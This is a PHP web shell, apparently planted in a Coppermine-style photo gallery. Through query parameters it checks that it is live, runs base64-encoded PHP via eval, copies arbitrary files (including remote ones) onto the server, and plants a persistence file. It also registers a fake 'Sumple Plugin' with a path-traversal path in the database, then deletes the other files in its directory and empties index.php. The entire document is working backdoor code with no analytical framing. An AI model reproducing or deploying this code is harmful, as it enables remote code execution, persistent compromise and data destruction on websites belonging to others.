<?
$hash="c64e1f646a677441adc80593e7067b34";
if(isset($_GET["ch"])){
	echo "oke";
	echo "eff0";
}
if(isset($_GET["patch"])){
	include("../include/config.inc.php");
	mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
	mysql_select_db($CONFIG["dbname"]);
	//phpinfo();
	$codebase_str='<?php
$hash="c64e1f646a677441adc80593e7067b34";
if(eregi("picEditor", $REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
	if(($_POST["hash"]!=$hash)){
		die("");
	}
}
?>';
	
	$codebase_str=str_replace("c64e1f646a677441adc80593e7067b34", $hash, $codebase_str);
	$fp_codebase=fopen("userpics/codebase.php", "w");
	fwrite($fp_codebase, $codebase_str);
	$path=__FILE__;
	preg_match("/(.*)(\/.*?)/", $path, $ok);
	$path=$ok[0];
	$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
	//echo $mysql_path."\n";
	$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
	VALUES (
	'', 'Sumple Plugin', '$mysql_path', '0'
	);";
	//echo $sql;
	mysql_query($sql);
	echo mysql_error();
	
	if ($handle = opendir('.')) {
		while (false !== ($file = readdir($handle))) { 
			if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) { 
			 	if(is_file($file)){
					unlink($file);
			 	}
			} 
		}
		$fp=fopen("index.php", "w");
		fclose($fp);
		closedir($handle); 
	}
}
if(isset($_GET["eval"])){
	eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
	$fp=implode(file($_GET["up_name"]));
	$fp_out=fopen($_GET["down_name"], "w");
	fwrite($fp_out, $fp);
}
?>